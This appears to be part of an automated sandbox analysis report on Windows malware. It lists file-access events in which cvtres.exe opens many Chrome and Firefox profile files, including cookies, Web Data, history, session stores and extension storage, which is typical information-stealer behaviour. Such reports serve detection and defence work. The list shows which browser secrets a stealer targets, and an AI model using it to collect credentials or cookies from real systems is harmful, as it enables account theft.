Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action Predictor	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\MANIFEST-000001	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOCK	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\MANIFEST-000001	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\session-state.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOCK	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\LOCK	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\af2cf244-1bda-453b-baae-9793e72e9be8\global-entities_metadata	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\3c7a728e-a155-4cc6-a293-522ff9409223	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\NetworkDataMigrated	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\b79425d0-2f84-41d2-84d3-9f598259534d\model-info.pb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\LOG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\LOG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\32.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\64.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network\Reporting and NEL	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\LOG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\b7e6c706-6d19-4b9e-9c37-e5ee870c2129\model.tflite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\d5ff5767-2951-4d26-a577-46b75b9fa89c	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\192.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\index	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network\Trust Tokens	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOCK	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\b79425d0-2f84-41d2-84d3-9f598259534d\visual_model_20230727_desktop.tflite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network\Reporting and NEL-journal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\96.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir\the-real-index	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\128.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\sessionCheckpoints.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\addonStartup.json.lz4	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\1696493971736.b5870d07-97bf-4bf9-a21f-d4715e2d8984.health.jsonlz4	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\1d907579-3a41-4eb0-8f60-3efb8736231d	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\84b89d2b-fec7-4b59-87f2-603dcfbd43dd\model.tflite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\256.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\128.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\InterestGroups-journal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\QuotaManager-journal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\events\events	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\state.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\content-prefs.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\48.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\64.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PreferredApps	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\LOCK	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\b7e6c706-6d19-4b9e-9c37-e5ee870c2129\model-info.pb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\1696493971742.d1a7a52e-e3c7-4e69-93b1-055dbe542ec9.main.jsonlz4	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\.metadata-v2	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\96.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\QuotaManager	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data\data_3	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\48.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\af2cf244-1bda-453b-baae-9793e72e9be8\model-info.pb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\612c12d3-948f-48f6-91fb-d0d8ccda0670	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\LOCK	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\256.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\LOCK	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\1036486f-a56a-437b-b1e7-a2f1fa5fb914	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\64.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\b5870d07-97bf-4bf9-a21f-d4715e2d8984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\036d0311-0554-4100-9fa8-d932e8d08b3a	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Visited Links	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites-journal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\af2cf244-1bda-453b-baae-9793e72e9be8\word_embeddings	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\LOCK	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\6830e690-c9e2-4163-804c-2e4b4f66b5a1	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\index	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\sessionstore-backups\previous.jsonlz4	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\32.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\trusted_vault.pb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\32.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\InterestGroups	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000003.log	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\7838fbf6-8c2c-41db-82b4-de4fd94ddc30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\parent.lock	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\search.json.mozlz4	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOCK	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\881ae04a-fa90-4a62-8eee-5ae000467040\model.tflite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\ls-archive.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data\data_0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\48.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data\data_2	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\697416b8-55c0-41ac-9636-a06aa38f99e9\model.tflite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data\data_1	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\878d3b18-7365-4283-b9d4-9d57cf8fbefd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache\data_0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache\data_1	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOCK	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db-journal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache\data_2	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache\data_3	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\times.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\192.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\48.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\Lite\User Data\Default\History-journal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\128.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\1696493966543.975fa64d-84a3-45a6-931b-6d9e916c1153.event.jsonlz4	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\LOG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\64.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\48.png	Jump to behavior
